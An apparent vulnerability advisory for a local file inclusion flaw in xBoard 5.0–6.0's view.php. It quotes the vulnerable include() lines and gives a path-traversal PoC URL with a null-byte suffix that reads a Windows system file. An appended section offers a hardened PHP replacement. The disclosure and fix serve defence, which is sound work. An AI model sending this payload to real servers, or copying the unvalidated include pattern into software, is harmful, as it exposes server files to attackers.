X-------------------------------------------------------------X
                       TUNISIAN CYBER
X-------------------------------------------------------------X

[+] Author: TUNISIAN CYBER
[+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/xboard/
[+] Google Dork:
[+] Tested on: Win7, Ubuntu 13.04

########################################################################################

I/ Vulnerable code: view.php

v5.0:
49: if (file_exists("$directory/$post.html"))
50: {
51:     include("$directory/$post.html");

v5.5:
28: if (file_exists("$directory/$post.html"))
29: {
30:     include("$directory/$post.html");

v6.0:
27: if (file_exists("$directory/$post.html"))
28: {
29:     include("$directory/$post.html");

The post parameter from the query string is concatenated straight into the include path with no validation. A "../" sequence walks out of the posts directory, and a trailing %00 truncates the path so the hard-coded ".html" suffix is never appended. file_exists() only confirms the attacker-chosen file exists before include() reads it.

II/ Exploit and PoC:

http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00

PoC screenshot: http://oi44.tinypic.com/2uxyaz9.jpg

III/ Solution: Upgrade to v6.5

./3nD

########################################################################################

Greets to: XMaXtn, N43il HacK3r, XtechSEt
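Two practical notes on the PoC above, and one hardened form of the vulnerable lines. The %00 truncation in the PoC URL only works on PHP versions before 5.3.4; from 5.3.4 on, file_exists() and include() reject paths containing a NUL byte, so the ".html" suffix stays attached. The "../" traversal itself still works on every PHP version, so any file on the server whose name ends in ".html" remains reachable. The following is an added example, not xBoard's own code and not the v6.5 fix: it is a replacement for the file_exists()/include() pair in view.php. The $directory value is a hypothetical posts path standing in for whatever xBoard configures, and the example reads the post file instead of include()-ing it, which is an assumption that post files are static HTML.

```php
<?php
// Added example (not xBoard code): hardened replacement for the
// file_exists()/include("$directory/$post.html") pair in view.php.
// $directory is a hypothetical stand-in for xBoard's posts directory.
$directory = __DIR__ . '/posts';

function load_post(string $directory, string $post): string
{
    // Allowlist the post identifier: letters, digits, '-' and '_' only,
    // bounded length. This rejects '/', '\', '.', NUL and every other
    // character that could alter the path, so neither "../" traversal
    // nor %00 truncation of the ".html" suffix can occur.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $post)) {
        http_response_code(400);
        exit('invalid post id');
    }

    // Defence in depth: resolve both paths and require the post file to
    // sit inside the posts directory (also covers symlinks placed there).
    $base = realpath($directory);
    $path = realpath($directory . '/' . $post . '.html');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        exit('no such post');
    }

    // Assumption: post files are static HTML. Returning their bytes instead
    // of include()-ing them means a writable posts directory cannot turn
    // into PHP code execution. If xBoard relies on include() to run PHP
    // inside post files, keep include($path) here; the checks above still
    // confine it to the posts directory.
    return file_get_contents($path);
}

$post = isset($_GET['post']) ? (string) $_GET['post'] : '';
echo load_post($directory, $post);
```

With this in place the PoC request (post=../../../../../../../../../../windows/win.ini%00) fails the allowlist and gets a 400 before any filesystem call is made; a request for a post that does exist, such as post=welcome, resolves to posts/welcome.html and is served as before.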